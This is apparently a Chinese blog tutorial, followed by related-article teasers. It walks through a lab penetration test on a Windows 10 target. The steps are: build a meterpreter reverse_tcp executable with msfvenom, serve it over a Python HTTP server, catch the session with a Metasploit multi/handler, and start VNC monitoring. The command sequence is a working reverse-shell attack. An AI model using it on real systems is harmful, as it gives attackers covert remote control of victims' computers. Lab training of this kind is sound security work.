一次简单的渗透测试

最新推荐文章于 2024-07-03 22:24:05 发布
最新推荐文章于 2024-07-03 22:24:05 发布
阅读量447 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 网络安全 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sunkaijie123/article/details/128547899

一、环境

kali2022.4,靶机环境win10物联网企业版,工具:msfvenom、msfconsole、python3

二、具体步骤

1、管理员权限打开终端

2、生成可执行文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=本地ip LPORT=指定端口 -f exe -o test.exe

3、在目标靶机下载生成的test.exe程序

1)在kali执行python3 -m http.server

2)在目标靶机进行下载

4、执行msfconsole命令

5、配置参数

use exploit/multi/handler(选择模块)

set payload windows/meterpreter/reverse_tcp(选择攻击模块)

set LhOST 本地ip

set lport 指定端口号

show options(查看配置的参数)

exploit -z -j(后台执行)

6、在靶机运行可执行程序test.exe

7、执行sessions查看上钩的用户

8、执行sessions -i 1进行攻击,出现meterpreter说明你就已经成功的入侵的对方的电脑

9、运行run vnc -i进行远程监控靶机

某平台的一次简单渗透测试记录
HBohan的博客
11-17 2532
目标 某平台系统(www.target.net) 流程 本次渗透测试的流程图: 【技术资料】 测试 拿到站点后先做信息收集,扫描目录看看有无敏感信息 寥寥无几,没有任何信息,启动burpsuite打开网站走一遍流程。 在创建目标处存在图片上传接口,上传shell试试。 没有任何过滤,可直接上传,但当前目录不解析,猜测projectKey控制上传路径 可跨目录上传,但当前/webapp/test/uploadFile/路径非网站根目录,爆破了常见网站目录但没有一个是正确的解析shell的,先放
[xueqi]在校园内网中的一次简单渗透测试
XUEQI的博客
10-12 2976
首先设备接入在学校内网,lan网络的掩码是255.255.252.0 我的ip为10.3.16.* 开启扫描器扫了一遍自己网段机器,由于周末发现存活的ip很少,果断扩大扫描网络,增加网络号区间。 一通扫描发现大量的存活的主机,对几个常用端口扫描,发现几个投影仪存活,存在80端口,小伙伴简单研究下,发现web控制界面弱口令,然后可以进行开关机,调节参数等权限。 还发现大量开启135,138,1...
渗透测试指南——工具
热门推荐
土豆的博客
11-05 7万+
——D&X安全实验室 工欲善其事,必先利其器。回到过去的旧时代,渗透测试是一件非常困难的事,并且需要大量的手动操作。然而如今,渗透测试工具是"安全军火库"中最常使用的装备,一整套的自动化测试工具似乎不仅改造了渗透测试人员,甚至还可以增强计算机的性能,进行比以往更全面的测试。 对渗透测试人员来说不用任何自动化工具对网站或者应用程序进行渗透测试是一件十分困难的事。因此选择一个正确的工具则变得尤为重要,正确的选择甚至占去了渗透测试成功的半壁江山。本篇文章就来和大家介绍一...
tftp.exe测试工具,简单测试tftp服务
12-18
tftp.exe测试工具,简单测试tftp服务,可以作为客户端也可以作服务端
简单的练习渗透测试的方法(真的很简单
caption88的博客
12-01 1758
首先渗透测试就是传说的黑客选手。砸门现在开始教程(文中涉及很多下载链接,本人就是使用这个链接,所以我也不知道有没有中毒,不过既然要做这一行,砸门不是已经被黑就是在被黑的路上。所以没有关系啦) 第一步:虽然我们不能确定自己被没有被黑,或者我们安装的软件是否有毒的情况下,砸门先开一个保护的东西再说:比如360,或者电脑管家,或者知名公司旗下的产品。知名公司例如:知道创宇,360,绿盟等。我反正...
day09、1 - 简单渗透测试流程
Edimade的博客
05-08 1303
一、hacker的攻击基本流程(渗透测试流程)>二、渗透工具>三、渗透工具渗透原理>四、渗透攻击举例--IPC$>五、相关命令总结
第18节 简单渗透测试流程及实验
m0_64378913的博客
01-03 2554
本文章仅供教学研究使用,切莫在真实环境中试验。本节主要围绕网络渗透流程这一主题,从概述入手介绍扫描漏洞、暴力破解、445漏洞利用之IPC$、留后门等主要步骤,随后对每个步骤采用一个小实验进行讲解分析。
利用MS12-020进行的一次简单渗透测试
meyo的博客
09-12 2万+
一、 实验目的 掌握Nmap扫描器的安装与使用; 掌握Nmap进行远程OS检测的原理; 掌握Nessus在本机或远程控制,进行漏洞分析扫描; 掌握Metasploit对目标漏洞的利用; 运用Nmap、Nessus、Metasploit进行一次简单的内网渗透; 该实验为综合性实验。 二、 实验原理及方法 用Nmap对目标主机进行扫描,从而得到目标主机的主机发现、端口扫描、应用与版本侦测、...
网络安全】记一次简单渗透测试实战
lzhy666的博客
03-29 481
网络安全】记一次简单渗透测试实战
exe文件检查工具(ExEinfo PE)0.0.3.2 中文绿色完美版
08-04
以前用过个工具对软件进行破解,因为时间关系,一直没有上传到网站上来,今天因为工作的关系,又找出这个exe文件检查工具(ExEinfo PE),找得好辛苦啊,所以马上先放到网上,方便自己又方便朋友们。   ExEinfo PE 是一款免费的Win32可执行程序检查器,它可以检查程序的打包方式,exe保护等,可以帮助开发人员对程序进行破解,我们通常又称为查壳工具。   用这个工具查看软件有没有加壳,或是用什么工具进行加壳的,方便我们使用相关的脱壳工具对软件进行脱壳。 使用方法:   1、下载解压软件后进行运行   2、将需要查壳的exe或是dll文件拖到软件里面,当然也可以使用浏览的形式,不过里好像有点小bug,一开始好慢,好像点用了什么资源。   3、有一个选项,可以让你选择快速扫描,或是其它方式,一般我们无需去设置,直接默认就可以了。 软件截图
一次曲折的渗透测试之旅1
08-03
在本文中,作者分享了一次具体的渗透测试经历,这是一次授权测试,即得到目标网站所有者的许可进行的测试。首先,进行了信息收集阶段,这是渗透测试的第一步。通过扫描子域名和端口,获取目标系统的基本信息。在这次...
web调用exe_WEB安全渗透测试基础知识(八)
weixin_39848097的博客
12-12 271
3.5. 命令注入3.5.1. 简介命令注入通常因为指Web应用在服务器上拼接系统命令而造成的漏洞。该类漏洞通常出现在调用外部程序完成一些功能的情景下。比如一些Web管理界面的配置主机名/IP/掩码/网关、查看系统信息以及关闭重启等功能,或者一些站点提供如ping、nslookup、提供发送邮件、转换图片等功能都可能出现该类漏洞。3.5.2. 常见危险函数3.5.2.1. PHPsystemexe...
渗透测试怎么做?看完这个我也学会了
kk_lzvvkpj的博客
07-03 1791
CSRF,全称为Cross-Site Request Forgery,跨站请求伪造,是一种网络攻击方式,它可以在用户毫不知情的情况下,以用户的名义伪造请求发送给被攻击站点,从而在未授权的情况下进行权限保护内的操作,如修改密码,转账等。① 根据前期信息搜集的信息,查看相关组件的版本,看是否使用了不在支持或者过时的组件。一些网站由于业务需求,可能提供文件查看或下载的功能,如果对用户查看或下载的文件不做限制,则恶意用户就能够查看或下载任意的文件,可以是源代码文件、敏感文件等。端口开放情况,是否开放了多余的端口;
客户端渗透
最新发布
8888的博客
07-03 939
介绍:我们要进行客户端渗透,我们生成一个可执行程序,也是简单粗暴,MSF建立监听,把它发给受害者,只要受害者点击,监听机监听的机器直接上线(现在这种方法一般不会成功,杀毒软件会直接杀掉,这个程序可以经过几种语言编码,降低杀毒软件的防范可能直接免杀,虽然不能实际直接使用,但可以让我们了解和预防这类的攻击,本质上是一样的) 生成一个带有反弹连接的EXE程序:开启Apache服务使能够下载:访问这个虚拟机IP及其对应的文件,下载放在靶机上面去,并且关闭杀毒软件,要不然会直接把程序清除MSF开启监听:我们点击我们下
Exe程序测试总结
qq_25672165的博客
03-17 2363
测试流程 需求评审→需求基线→测试计划→梳理功能测试点→测试方案→编写测试用例并评审→测试执行并回归→编写用户手册、测试报告 ``` 2. 测试要点 功能、界面 冒烟测试(主要业务流程)→基本流、异常流→表单约束→模块交互→特殊功能 界面美观、布局合理、符合用户正常使用习惯 ``` 稳定性 .exe安装包或build包测试 7*24小时 程序崩溃或卡死原因:命名重复、内...
Windows编译开源代码方法之关于lame.exe文件的测试及过程
apple_53371070的博客
01-28 2831
在写的过程中实验了很多Markdown的格式。也算是有所收获。
WebServiceStudio.exe测试webservice接口工具
松门一枝花
09-25 1万+
WebServiceStudio.exe测试webservice接口工具 下载链接 https://pan.baidu.com/s/1gf8ajS3  打开工具WebServiceStudio,如下填写地址,点击【Get】按钮     会显示出需要传参的地方,在value中填写xml参数  输入完value值后,点击【Invoke】按钮,输出结果  ...
使用ab进行压力测试详解
qi_ruihua的专栏
03-10 1038
当你使用PHP(或其他编程语言)完成一个web程序的开发,并且web程序在Apache服务器上正常运行的时候,你有没有考虑过对你的Apache服务器及部署在其上的web程序进行一些压力测试呢?毕竟,真金不怕火炼,只要配置优化合理、程序代码运行性能良好、硬件撑得住,通过压力测试我们就能看到一个喜人的成绩。话又说回来,即使测试结果差强人意或者糟糕透了,我们也可以好好反思并找到「问题出在哪里」。说了这么
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

古道青阳

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值